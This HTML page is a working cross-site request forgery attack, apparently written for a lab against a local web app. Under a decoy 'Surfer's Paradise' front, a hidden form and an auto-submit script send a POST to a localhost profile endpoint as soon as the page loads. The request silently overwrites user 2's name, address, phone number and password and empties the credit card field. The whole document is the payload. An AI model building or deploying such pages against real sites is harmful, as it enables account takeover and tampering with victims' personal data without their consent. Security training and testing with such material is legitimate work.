<html>
<body>
	<iframe style="display:none" name="csrf-frame"></iframe>
	<form id="command" method='POST' accept-charset="ISO-8859-1" action='http://localhost:8080/profile' target="csrf-frame">
        <input type="hidden"id="username" name="username" placeholder="Benutzername" class="form-control" type="text" value="g"/>
        <input type="hidden"id="firstname" name="firstname" placeholder="Vorname" class="form-control" type="text" value="Gustav"/>
        <input type="hidden"id="lastname" name="lastname" placeholder="Nachname" class="form-control" type="text" value="Gans"/>
        <input type="hidden"id="creditcardnumber" name="creditcardnumber" placeholder="Kreditkartennummer" class="form-control" type="text" value=""/>
        <input type="hidden"id="phonenumber" name="phonenumber" placeholder="Telefonnummer" class="form-control" type="text" value="+49 (451) 20955152"/>
        <input type="hidden"id="zip" name="zip" placeholder="PLZ" class="form-control" type="text" value="23568"/>
        <input type="hidden"id="town" name="town" placeholder="Ort" class="form-control" type="text" value="L&uuml;beck"/>
        <input type="hidden"id="password" name="password" placeholder="Passwort" class="form-control" type="password" value="8666"/>
        <input type="hidden"id="password2" name="password2" placeholder="Passwort wiederholen" class="form-control" type="password" value="8666"/>
        <input type="hidden" name="submit-btn" type="submit" value="Speichern"/>
        <input id="userid" name="userid" type="hidden" value="2"/>
	</form>
	<script>document.getElementById("command").submit();</script>
	<h1>Surfer's Paradise</h1>
	<p> Your #1 resource for all the best spots in the world...</p>
</body>
</html>